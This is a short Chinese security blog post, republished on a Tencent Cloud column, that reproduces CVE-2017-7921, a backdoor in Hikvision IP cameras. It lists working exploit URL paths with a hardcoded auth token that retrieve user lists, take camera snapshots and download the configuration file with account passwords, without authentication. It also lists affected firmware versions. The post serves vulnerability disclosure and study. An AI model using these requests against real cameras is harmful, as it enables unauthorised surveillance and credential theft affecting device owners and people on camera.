前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >CVE-2017-7921漏洞复现

CVE-2017-7921漏洞复现

作者头像
字节脉搏实验室
发布2020-10-27 11:01:38
6.8K0
发布2020-10-27 11:01:38
举报
文章被收录于专栏:字节脉搏实验室

作者-Beginner

0x01 CVE-2017-7921漏洞复现

许多HikvisionIP摄像机包含一个后门,允许未经身份验证的模拟任何配置的用户帐户。

0x02 漏洞复现:

利用Goby发现漏洞(CVE-2017-7921):

利用路径:/Security/users?auth=YWRtaW46MTEK

附:检索所有用户及其角色的列表

利用路径:/onvif-http/snapshot?auth=YWRtaW46MTEK

附:获取相机快照而不进行身份验证

利用路径:

/System/configurationFile?auth=YWRtaW46MTEK

附:下载摄像头配置账号密码文件

0x03 漏洞影响版本:

HikvisionDS-2CD2xx2F-ISeries5.2.0build140721

版本至5.4.0build160530版本;

DS-2CD2xx0F-ISeries5.2.0build140721

版本至5.4.0Build160401版本;

DS-2CD2xx2FWDSeries5.3.1build150410

版本至5.4.4Build161125版本;

DS-2CD4x2xFWDSeries5.2.0build140721

版本至5.4.0Build160414版本;

DS-2CD4xx5Series5.2.0build140721

版本至5.4.0Build160421版本;

DS-2DFxSeries5.2.0build140805

版本至5.4.5Build160928版本;

DS-2CD63xxSeries5.0.9build140305

版本至5.3.5Build160106版本

0x04 参考链接:

https://packetstormsecurity.com/files/144097/Hikvision-IP-Camera-Access-Bypass.html

https://www.seebug.org/vuldb/ssvid-96469

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2020-10-12,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 字节脉搏实验室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
多因子身份认证
多因子身份认证(Multi-factor Authentication Service,MFAS)的目的是建立一个多层次的防御体系,通过结合两种或三种认证因子(基于记忆的/基于持有物的/基于生物特征的认证因子)验证访问者的身份,使系统或资源更加安全。攻击者即使破解单一因子(如口令、人脸),应用的安全依然可以得到保障。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档